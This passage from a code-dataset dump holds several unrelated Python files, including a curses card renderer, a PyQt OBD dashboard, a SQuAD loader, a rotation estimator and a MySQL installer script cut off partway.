instead of urlparse.urljoin to append path to base in an obvious way.\n\n >>> urlappend('https://test.com/base-path', 'my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path/', 'my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path/', '/my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path', '/my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path', '/my-path/')\n 'https://test.com/base-path/my-path/'\n \"\"\"\n path = path.lstrip('/')\n if not base.endswith('/'):\n base = '{!s}/'.format(base)\n return '{!s}{!s}'.format(base, path)\n\n\ndef get_flux_type(req, suffix):\n \"\"\"\n :param req: flask request\n :type req: flask.request\n :param suffix: SUCCESS|FAIL|?\n :type suffix: str|unicode\n :return: Flux type\n :rtype: str|unicode\n \"\"\"\n method = req.method\n blueprint = req.blueprint\n # Remove APPLICATION_ROOT from request url rule\n # XXX: There must be a better way to get the internal path info\n app_root = current_app.config['APPLICATION_ROOT']\n if app_root is None:\n app_root = ''\n url_rule = req.url_rule.rule.replace(app_root, '')\n url_rule = url_rule.replace('/', ' ').replace('-', ' ')\n url_rule = re.sub(r'<.+?>', '', url_rule)\n flux_type = '_'.join('{!s} {!s} {!s} {!s}'.format(method, blueprint, url_rule, suffix).split()).upper()\n return flux_type\n\n\ndef init_template_functions(app):\n\n @app.template_global()\n def static_url_for(f):\n return urlappend(current_app.config['EDUID_STATIC_URL'], f)\n\n return 
app\n","sub_path":"src/eduid_common/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290658063","text":"import curses, locale\n\nfrom rects import rect\n\nfull_cards = [\n\t[\n\t\t\" x\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \",\n\t\t\"x \"\n\t], [\n\t\t\" x\",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\"x \"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"xxx\",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"x x\",\n\t\t\" x \",\n\t\t\"x x\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\" \",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\" x \",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"xxx\",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\" \",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\" \"\n\t]\n]\n\nrankstrings = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nsuitstrings = [s.encode(locale.getpreferredencoding()) for s in [u'\\u2660', u'\\u2665', u'\\u2666', u'\\u2663']]\nsuitcolors = [2, 1, 1, 2]\n\nclass Rank:\n\tdef __init__(self, rank):\n\t\tif isinstance(rank, basestring):\n\t\t\tself.ranknum = rankstrings.index(rank)\n\t\telif isinstance(rank, int):\n\t\t\tassert 0 <= rank < 13\n\t\t\tself.ranknum = rank\n\t\telse:\n\t\t\tself.ranknum = rank.ranknum\n\tdef icon(self):\n\t\treturn rankstrings[self.ranknum]\n\tdef face(self):\n\t\tface = []\n\t\ticon = self.icon()\n\t\ticon_padding = ' ' * (7 - len(icon))\n\t\tface.append(icon + icon_padding)\n\t\tface.extend([' ' + ' '.join(s) + ' ' for s in full_cards[self.ranknum]])\n\t\tface.append(icon_padding + icon)\n\t\treturn face\n\tdef __cmp__(self, other):\n\t\treturn self.ranknum - other.ranknum\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n\nclass Suit:\n\tdef __init__(self, suit):\n\t\tif isinstance(suit, basestring):\n\t\t\tself.suitnum = suitstrings.index(suit)\n\t\telif isinstance(suit, int):\n\t\t\tassert 0 <= suit < 4\n\t\t\tself.suitnum = suit\n\t\telse:\n\t\t\tself.suitnum = suit.suitnum\n\tdef icon(self):\n\t\treturn suitstrings[self.suitnum]\n\tdef color(self):\n\t\treturn curses.color_pair(suitcolors[self.suitnum])\n\tdef __cmp__(self, other):\n\t\treturn self.suitnum - other.suitnum\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n\nranks = [Rank(x) for x in xrange(13)]\nsuits = [Suit(x) for x in xrange(4)]\nspades, hearts, diamonds, clubs = suits\n\nclass Card:\n\t\"\"\"A card in a 52-card deck that can be drawn to the screen.\"\"\"\n\tdef __init__(self, rank, suit):\n\t\tself.rank = Rank(rank)\n\t\tself.suit = Suit(suit)\n\tdef icon(self):\n\t\treturn self.rank.icon() + self.suit.icon()\n\tdef draw(self, win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 9, 9)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\ti = 1\n\t\t\tfor line in self.rank.face():\n\t\t\t\tsub.addstr(i, 1, line.replace('x', self.suit.icon()))\n\t\t\t\ti += 1\n\t\telse:\n\t\t\tfor i in xrange(7):\n\t\t\t\tsub.addstr(i + 1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 7)\n\tdef draw_small_h(self, 
win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 9, 4)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\tsub.addstr(1, 1, self.rank.icon())\n\t\t\tsub.addstr(2, 1, self.suit.icon())\n\t\telse:\n\t\t\tfor i in xrange(7):\n\t\t\t\tsub.addstr(i + 1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 2)\n\tdef draw_small_v(self, win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 3, 9)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\tsub.addstr(1, 1, self.icon())\n\t\telse:\n\t\t\tsub.addstr(1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 7)\n\tdef __cmp__(self, other):\n\t\tc = self.suit.__cmp__(other.suit)\n\t\tif c != 0: return c\n\t\treturn self.rank.__cmp__(other.rank)\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"128683116","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEncoding issues\nPython 2 has str and unicode; Python 3 has bytes and str.\nThe former hold raw 8-bit values, the latter hold Unicode characters; in both Python 2 and Python 3 a plain string literal is of type str.\nThe core of a Python program should work with Unicode (UTF-8 at the boundaries), so in Python 2 strings should be normalised by decoding str to unicode,\nand the same reasoning applies in Python 3, where bytes likewise need to be decoded to str.\n\"\"\"\n\ndef to_str(bytes_or_str):\n    if isinstance(bytes_or_str, bytes):\n        value = bytes_or_str.decode(\"utf-8\")\n    else:\n        value = bytes_or_str\n    return value\n\n\ndef to_bytes(bytes_or_str):\n    if isinstance(bytes_or_str, str):\n        value = bytes_or_str.encode(\"utf-8\")\n    else:\n        value = bytes_or_str\n    return value\n\n\nif __name__ == '__main__':\n    a = \"hello world\"\n    b = to_str(a)\n    print(b)\n    c = to_bytes(b)\n    print(c)\n","sub_path":"python/effectivePython/item3.py","file_name":"item3.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"485406729","text":"#############################################\n# Generating pdbqts from mol2 using MGLTools#\n#############################################\n\n# Usage: python mol2pdbqt.py num_processes\n\nimport glob\nfrom multiprocessing import Pool\nimport os\nfrom subprocess import call\nimport sys\nimport time\n\n# MGLTools environment\nPIPELINE_DIR = os.path.dirname(os.path.realpath(__file__))\nos.environ['MGL_ROOT'] = PIPELINE_DIR + \"/MGLTools\"\n\n \ndef convert2pdbqt(ligand):\n    \"\"\"Uses MGLTools to convert a ligand to pdbqt.\"\"\"\n    root_name = os.path.splitext(ligand)[0]\n    # Split ligand\n    call([\"MGLTools/bin/pythonsh\",\n          \"MGLTools/MGLToolsPckgs/AutoDockTools/Utilities24/prepare_ligand4.py\",\n          \"-l\", ligand, \"-o\", root_name + \".pdbqt\"])\n\n\nif __name__ == \"__main__\":\n    # User inputs\n    target_path = sys.argv[1].rstrip(\"/\")\n    n_cpus = int(sys.argv[2])\n    # Generate list of ligands\n    actives = glob.glob(target_path + \"/actives/*.mol2\")\n    decoys = glob.glob(target_path + \"/decoys/*.mol2\")\n    ligands = actives + decoys\n    # Start process pool\n    pool = 
\n\tarXiv preprint arXiv:1806.03822.\n\n\tArgs:\n\t\tdirectory (str, optional): Directory to cache the dataset.\n train (bool, optional): If to load the training split of the dataset.\n dev (bool, optional): If to load the development split of the dataset.\n test (bool, optional): If to load the test split of the dataset.\n train_filename (str, optional): The filename of the training split.\n dev_filename (str, optional): The filename of the development split.\n test_filename (str, optional): The filename of the test split.\n extracted_name (str, optional): Name of the extracted dataset directory.\n check_files (str, optional): Check if these files exist, then this download was successful.\n url (str, optional): URL of the dataset `.json` file.\n\n\n Returns:\n :class:`tuple` of :class:`iterable` or :class:`iterable`:\n Returns between one and all dataset splits (train, dev and test) depending on if their\n respective boolean argument is ``True``.\n\n Example:\n >>> from torchnlp.datasets import squad_dataset # doctest: +SKIP\n >>> train = snli_dataset(train=True) # doctest: +SKIP\n >>> train[0:2] # doctest: +SKIP\n [{\n 'question': 'In what country is Normandy located?', \n 'answer': ['France', 'France', 'France', 'France']\n }, {\n 'question': 'When were the Normans in Normandy?', \n 'answer': ['10th and 11th centuries', 'in the 10th and 11th centuries', \n '10th and 11th centuries', '10th and 11th centuries']\n }]\n\n\t\"\"\"\n\n\tdownload_files_maybe_extract(urls=urls, directory=directory, check_files=check_files)\n\n\tret = []\n\tsplits = [(train, train_filename), (dev, dev_filename)]\n\tsplits = [f for (requested, f) in splits if requested]\n\tfor filename in splits:\n\t\tfull_path = os.path.join(directory, extracted_name, filename)\n\t\texamples = []\n\t\tdataset = json.load(f)\n\n\t\tfor article in dataset['data']:\n\t\t\tfor paragraph in article['paragraphs']:\n\t\t\t\tfor qa in paragraph['qas']:\n\t\t\t\t\tquestion = qa['question']\n\t\t\t\t\tanswer = [a['text'] for a in qa['answers']]\n\t\t\t\t\texamples.append({\n\t\t\t\t\t'question' : question,\n\t\t\t\t\t'answer' : answer\n\t\t\t\t\t})\n\t\tret.append(examples)\n\n\tif(len(ret)==1):\n\t\treturn ret[0]\n\telse:\n\t\treturn tuple(ret)","sub_path":"torchnlp/datasets/squad.py","file_name":"squad.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"254313496","text":"#############################################\n# Generating pdbqts from mol2 using MGLTools#\n#############################################\n\n# Usage: python mol2pdbqt.py num_processes\n\nimport glob\nfrom multiprocessing import Pool\nimport os\nfrom subprocess import call\nimport sys\nimport time\n\n# MGLTools environment\nPIPELINE_DIR = os.path.dirname(os.path.realpath(__file__))\nos.environ['MGL_ROOT'] = PIPELINE_DIR + \"/MGLTools\"\n\n \ndef convert2pdbqt(ligand):\n \"\"\"Uses MGLTools to convert a ligand to pdbqt.\"\"\"\n root_name = os.path.splitext(ligand)[0]\n # Split ligand\n call([\"MGLTools/bin/pythonsh\",\n \"MGLTools/MGLToolsPckgs/AutoDockTools/Utilities24/prepare_ligand4.py\",\n \"-l\", ligand, \"-o\", root_name + \".pdbqt\"])\n\n\nif __name__ == \"__main__\":\n # User inputs\n target_path = sys.argv[1].rstrip(\"/\")\n n_cpus = int(sys.argv[2])\n # Generate list of ligands\n actives = glob.glob(target_path + \"/actives/*.mol2\")\n decoys = glob.glob(target_path + \"/decoys/*.mol2\")\n ligands = actives + decoys\n # Start process pool\n pool = 
Pool(processes=n_cpus)\n    start_time = time.time()\n    # Run for each ligand\n    pool.map(convert2pdbqt, ligands)\n    stop_time = time.time()\n    print(\"Job completed in:\", stop_time - start_time, \"seconds\")\n","sub_path":"docking/mol2pdbqt.py","file_name":"mol2pdbqt.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623401578","text":"\"\"\"\r\n\r\nput functions at the top of the program\r\n\r\n\"\"\"\r\n\r\ndef fahrenheit(celsius):\r\n    '''Returns the input Celsius degrees in Fahrenheit'''\r\n    \r\n    return 9/5*celsius+32\r\n\r\ndef celsius(fahrenheit):\r\n    '''Returns the input Fahrenheit degrees in Celsius'''\r\n    return 5/9*(fahrenheit-32)\r\n\r\n''' call the function below the function definition'''\r\n\r\nc = float(input('Enter degrees in Celsius: '))\r\n''' input always returns a string to the computer'''\r\n\r\nf = fahrenheit(c)\r\n# You can print multiple items in one statement. If you put a comma after each\r\n# item, it prints a space and then goes on to print the next item. \r\n\r\nprint(c, \"C = \", f, 'F')\r\n\r\n# you can print this way too, but allowing exactly two decimal places.\r\n\r\nprint('%.2f C = %.2f F' %(c,f))\r\n#percent means you are going to have a placeholder\r\nf = float(input('Enter degrees in Fahrenheit: '))\r\nc = celsius(f)\r\n\r\nprint(f,'F =',c,'C')\r\nprint('%.2f F = %.2f C' %(f,c))\r\n\r\n'''\r\ntry composition of functions\r\nconverting a fahrenheit temperature to celsius and then back to fahrenheit should\r\ngive you the original fahrenheit temperature\r\n'''\r\n\r\nprint() # print by itself\r\nf = float(input('Enter degrees in Fahrenheit: '))\r\n\r\n#use assert to check that the returned value is equal to the expected value.\r\nassert(fahrenheit(celsius(f))) == f\r\n# no output should be produced unless the assertion fails.\r\n\r\n\r\n\r\n","sub_path":"temp_conversion.py","file_name":"temp_conversion.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348849401","text":"import sys\nimport time\nfrom threading import Thread\nimport obd\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(QtWidgets.QMainWindow):\n    def __init__(self):\n        QtWidgets.QMainWindow.__init__(self)\n        self.setupUi(self)\n    \n    def setupUi(self, MainWindow):\n        MainWindow.setObjectName(\"MainWindow\")\n        MainWindow.resize(480, 320)\n        MainWindow.setMinimumSize(QtCore.QSize(320, 240))\n        MainWindow.setMaximumSize(QtCore.QSize(480, 320))\n        font = QtGui.QFont()\n        font.setFamily(\"Arial Black\")\n        font.setPointSize(12)\n        font.setBold(True)\n        font.setWeight(75)\n        MainWindow.setFont(font)\n        MainWindow.setStyleSheet(\"background-color: rgb(0, 0, 0);\")\n        self.centralwidget = QtWidgets.QWidget(MainWindow)\n        self.centralwidget.setObjectName(\"centralwidget\")\n        self.rpm_val = QtWidgets.QLCDNumber(self.centralwidget)\n        self.rpm_val.setGeometry(QtCore.QRect(200, 30, 131, 71))\n        self.rpm_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n        self.rpm_val.setProperty(\"intValue\", 13000)\n        self.rpm_val.setObjectName(\"rpm_val\")\n        self.speed_val = QtWidgets.QLCDNumber(self.centralwidget)\n        self.speed_val.setGeometry(QtCore.QRect(20, 20, 161, 81))\n        font = QtGui.QFont()\n        font.setPointSize(11)\n        self.speed_val.setFont(font)\n        self.speed_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n        self.speed_val.setDigitCount(3)\n        self.speed_val.setProperty(\"intValue\", 100)\n        
self.speed_val.setObjectName(\"speed_val\")\n self.mileage_val = QtWidgets.QLCDNumber(self.centralwidget)\n self.mileage_val.setGeometry(QtCore.QRect(0, 190, 201, 41))\n self.mileage_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.mileage_val.setDigitCount(6)\n self.mileage_val.setProperty(\"intValue\", 350000)\n self.mileage_val.setObjectName(\"mileage_val\")\n self.fuel_val = QtWidgets.QProgressBar(self.centralwidget)\n self.fuel_val.setGeometry(QtCore.QRect(390, 40, 41, 201))\n self.fuel_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.fuel_val.setProperty(\"value\", 24)\n self.fuel_val.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)\n self.fuel_val.setTextVisible(True)\n self.fuel_val.setOrientation(QtCore.Qt.Vertical)\n self.fuel_val.setInvertedAppearance(False)\n self.fuel_val.setObjectName(\"fuel_val\")\n self.speed = QtWidgets.QLabel(self.centralwidget)\n self.speed.setGeometry(QtCore.QRect(40, 110, 141, 31))\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(17)\n font.setBold(True)\n font.setItalic(False)\n font.setWeight(75)\n self.speed.setFont(font)\n self.speed.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.speed.setFrameShadow(QtWidgets.QFrame.Plain)\n self.speed.setLineWidth(8)\n self.speed.setTextFormat(QtCore.Qt.AutoText)\n self.speed.setObjectName(\"speed\")\n self.rpm = QtWidgets.QLabel(self.centralwidget)\n self.rpm.setGeometry(QtCore.QRect(240, 110, 111, 31))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.rpm.setFont(font)\n self.rpm.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.rpm.setObjectName(\"rpm\")\n self.fuel = QtWidgets.QLabel(self.centralwidget)\n self.fuel.setGeometry(QtCore.QRect(360, 250, 111, 20))\n font = QtGui.QFont()\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.fuel.setFont(font)\n self.fuel.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.fuel.setObjectName(\"fuel\")\n self.mileage = QtWidgets.QLabel(self.centralwidget)\n self.mileage.setGeometry(QtCore.QRect(60, 240, 91, 31))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.mileage.setFont(font)\n self.mileage.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.mileage.setObjectName(\"mileage\")\n self.alerts_val = QtWidgets.QTextBrowser(self.centralwidget)\n self.alerts_val.setGeometry(QtCore.QRect(210, 170, 121, 71))\n self.alerts_val.setStyleSheet(\"color: rgb(255, 170, 0);\")\n self.alerts_val.setObjectName(\"alerts_val\")\n self.alerts = QtWidgets.QLabel(self.centralwidget)\n self.alerts.setGeometry(QtCore.QRect(230, 250, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.alerts.setFont(font)\n self.alerts.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.alerts.setObjectName(\"alerts\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n##################################################### For QA\n th = Thread(target=self.instrument_readings) #progress bar moves\n th.start()\n##################################################################\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", 
\"MainWindow\"))\n self.speed.setText(_translate(\"MainWindow\", \"MPH\"))\n self.rpm.setText(_translate(\"MainWindow\", \"RPM\"))\n self.fuel.setText(_translate(\"MainWindow\", \"Fuel Level\"))\n self.mileage.setText(_translate(\"MainWindow\", \"Mileage\"))\n self.alerts_val.setHtml(_translate(\"MainWindow\", \"<html><head/><body><p>Check Engine</p></body></html>
\"))\n self.alerts.setText(_translate(\"MainWindow\", \"Alerts\"))\n########################################### For QA\n def instrument_readings(self):\n connection = obd.OBD()\n rpmCmd = obd.commands.RPM\n speedCmd = obd.commands.SPEED\n fuelCmd = obd.commands.FUEL_LEVEL\n \n while 1:\n fuelResponse = connection.query(fuelCmd)\n rpmResponse = connection.query(rpmCmd)\n speedResponse = connection.query(speedCmd)\n\n fuelString = str(fuelResponse.value).split()\n rpmString = str(rpmResponse.value).split()\n speedString = str(speedResponse.value).split()\n\n if fuelString[0] != \"None\":\n fuel = float(fuelString[0])\n self.fuel_val.setValue(fuel)\n \n if speedString[0] != \"None\":\n # convert Kilometers per hour to Miles per hour\n speed = float(speedString[0]) * 0.62137119223733 \n self.speed_val.display(speed)\n\n if rpmString[0] != \"None\":\n rpm = float(rpmString[0])\n self.rpm_val.display(rpm)\n \n#################################################################### \n \n\n############################################### For QA\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n gui_window = Ui_MainWindow()\n gui_window.show()\n sys.exit(app.exec_())\n###############################################################\n","sub_path":"gui_test3.py","file_name":"gui_test3.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"481700326","text":"import numpy as np, scipy.optimize as optimize\n\ndef objectiveFunc(xVal, b, a):\n '''b is the source (pre-rotation) coordinate\n a is the destination (post-rotation) coordinate, \n '''\n w, x, y, z = xVal\n ww, xx, yy, zz = xVal**2\n return np.asarray([ \\\n b[0]*(ww + xx - yy - zz) + 2*b[1]*(x*y - w*z) + 2*b[2]*(x*z + w*y) - a[0], \\\n b[1]*(ww - xx + yy - zz) + 2*b[0]*(x*y + w*z) + 2*b[2]*(y*z - w*x) - a[1], \\\n b[2]*(ww - xx - yy + zz) + 2*b[0]*(x*z - w*y) + 2*b[1]*(w*x + y*z) - a[2], \\\n w*w + x*x + y*y + z*z - 1]) # unit-norm constraint, matching the [2w, 2x, 2y, 2z] Jacobian row\n\ndef jacobianFunc(xVal, b, a):\n w, x, y, z = xVal\n return np.asarray([ \\\n [ 2*b[0]*w - 2*b[1]*z + 2*b[2]*y, \\\n 2*b[0]*x + 2*b[1]*y + 2*b[2]*z, \\\n -2*b[0]*y + 2*b[1]*x + 2*b[2]*w, \\\n -2*b[0]*z - 2*b[1]*w + 2*b[2]*x], \\\n [ 2*b[1]*w + 2*b[0]*z - 2*b[2]*x, \\\n -2*b[1]*x + 2*b[0]*y - 2*b[2]*w, \\\n 2*b[1]*y + 2*b[0]*x + 2*b[2]*z, \\\n -2*b[1]*z + 2*b[0]*w + 2*b[2]*y], \\\n [ 2*b[2]*w - 2*b[0]*y + 2*b[1]*x, \\\n -2*b[2]*x + 2*b[0]*z + 2*b[1]*w, \\\n -2*b[2]*y - 2*b[0]*w + 2*b[1]*z, \\\n 2*b[2]*z + 2*b[0]*x + 2*b[1]*y], \\\n [2*w, 2*x, 2*y, 2*z]])\n\ndef estimate(source, dest, r0 = np.asarray([0, 1, 1, 1])):\n '''Estimate the rotation quaternion needed in order to rotate *source* into *dest*\n '''\n assert type(source) is np.ndarray and source.shape == (3, )\n assert type(dest) is np.ndarray and dest.shape == (3, )\n #r, infodict, ier, mesg = optimize.fsolve(objectiveFunc, r0, args=(source, dest), fprime=jacobianFunc, full_output=True)\n sol = optimize.root(objectiveFunc, r0, args=(source, dest), jac=jacobianFunc, method='broyden1')\n r = sol.x\n r /= np.linalg.norm(r)\n #return r, infodict, ier, mesg\n return r
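\n\nif __name__ == '__main__':\n # Illustrative usage -- an added sketch, not part of the original module:\n # recover the unit quaternion that rotates the x-axis onto the y-axis\n # (one valid solution is a 90-degree turn about z, [cos45, 0, 0, sin45], up to sign).\n src = np.asarray([1.0, 0.0, 0.0])\n dst = np.asarray([0.0, 1.0, 0.0])\n print('estimated unit quaternion (w, x, y, z):', estimate(src, dst))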
","sub_path":"rotationEstimator/rotationEstimator.py","file_name":"rotationEstimator.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"392728870","text":"#!/usr/local/bin/python3\n#coding=utf-8\n\nimport subprocess\nimport os\nimport shutil # for copying files\nfrom progressbar import *\n\n#\n# Purpose:\n# install a MySQL instance on port 3306 quickly from the binary tarball\n# Basic usage:\n# upload the my_3306.cnf file to the /etc directory\n\ncnf_file_path = '/etc/my_3306.cnf'\ndata_path = '/data/mysql/3306/'\nerror_path = '/data/mysql/3306/data/error.log'\n\nversion_http_dict = {\n 'mysql-5_7_20': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_21': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.21-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_22': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.22-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_23': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.23-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_24': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_26': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.26-linux-glibc2.12-x86_64.tar.gz',\n}\n\nversion_has_download_dict = {\n 'mysql-5_7_20': '/usr/local/mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_21': '/usr/local/mysql-5.7.21-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_22': '/usr/local/mysql-5.7.22-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_23': '/usr/local/mysql-5.7.23-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_24': '/usr/local/mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz',\n}\n\n# 1. Create the MySQL user and group\n\ndef add_mysql_user():\n try:\n cmd_create_group = 'groupadd mysql'\n (status, output) = subprocess.getstatusoutput(cmd_create_group)\n if status == 0:\n print('create group mysql success')\n else:\n raise Exception\n cmd_create_user = 'useradd -g mysql -d /usr/local/mysql -s /sbin/nologin -M mysql'\n (status, output) = subprocess.getstatusoutput(cmd_create_user)\n if status == 0:\n print('create user mysql success')\n else:\n raise Exception\n\n except Exception:\n print('creating the mysql user and group hit an error, please check')\n\n# 2. Return the uid and gid of the MySQL user and group\ndef get_uid_gid():\n cmd_getuid = 'id -u mysql'\n cmd_getgid = 'id -g mysql'\n # os.popen() returns a file-like object, so read() it and strip the trailing newline\n uid = os.popen(cmd_getuid).read().strip('\\n')\n gid = os.popen(cmd_getgid).read().strip('\\n')\n print('uid:', uid, 'gid:', gid)\n # return (uid, gid)\n\n\ndef get_version(version):\n\n if version == 1:\n version = 'mysql-5_7_20'\n elif version == 2:\n version = 'mysql-5_7_21'\n elif version == 3:\n version = 'mysql-5_7_22'\n elif version == 4:\n version = 'mysql-5_7_23'\n elif version == 5:\n version = 'mysql-5_7_24'\n else:\n version = 'mysql-5_7_24'\n return version\n\n\n# 3. Ask which version should be installed\n\ndef input_get_version():\n\n print('''\nYou have 5 options for your database version install.\n1: Install MySQL 5.7.20\n2: Install MySQL 5.7.21\n3: Install MySQL 5.7.22\n4: Install MySQL 5.7.23\n5: Install MySQL 5.7.24\n ''')\n\n version = int(input(\"Enter your choice (1, 2, 3, 4, 5): \")) # TODO: could also add a Y/N confirmation here\n version = get_version(version)\n return version\n ### exit prompt\n #input(\"Press enter to exit\")\n\n# 4. Download the binary tarball\n\ndef wget_download():\n try:\n version_addr = input_get_version()\n print(version_http_dict[version_addr])\n download_mysql_cmd = 'wget -P {} {}'.format('/usr/local/', version_http_dict[version_addr])\n (status, output) = subprocess.getstatusoutput(download_mysql_cmd)\n if status == 0:\n print(output)\n print('wget mysql finished')\n else:\n print(output)\n raise Exception\n except Exception:\n print('wget mysql error, Please check the http addr')\n exit()\n\n# 5. Extract the downloaded binary tarball
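\n# Added note: tar's --strip-components 1 (used below) drops the tarball's top-level\n# mysql-x.y.z directory, so its contents land directly under /usr/local/mysql.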
\n\ndef untar():\n\n try:\n # version_addr = input_get_version()\n untar_cmd = 'mkdir /usr/local/mysql && tar -xzvf {} -C /usr/local/mysql --strip-components 1'.format(version_has_download_dict['mysql-5_7_24'])\n print ('start tar -xzvf mysql tar gz..........')\n pbar = ProgressBar().start()\n (status, output) = subprocess.getstatusoutput(untar_cmd)\n if status == 0:\n pbar.finish()\n print('untar finished')\n else:\n raise Exception\n except Exception:\n print('untar hit an error, please check the archive')\n exit()\n\n# 6. Give ownership of the MySQL base dir to the mysql user\ndef base_dir_chown():\n try:\n mysql_base_dir = 'chown -R mysql:mysql /usr/local/mysql/'\n (status, output) = subprocess.getstatusoutput(mysql_base_dir)\n if status == 0:\n print('chown mysql base dir success')\n else:\n raise Exception\n except Exception:\n print('chown mysql base dir error')\n\n# 7. Create the data directories and give ownership to the mysql user\n\ndef prepare(port):\n try:\n os.makedirs('/data/mysql/{}/data'.format(port))\n os.mkdir('/data/mysql/{}/logs'.format(port))\n os.mkdir('/data/mysql/{}/tmp'.format(port))\n\n 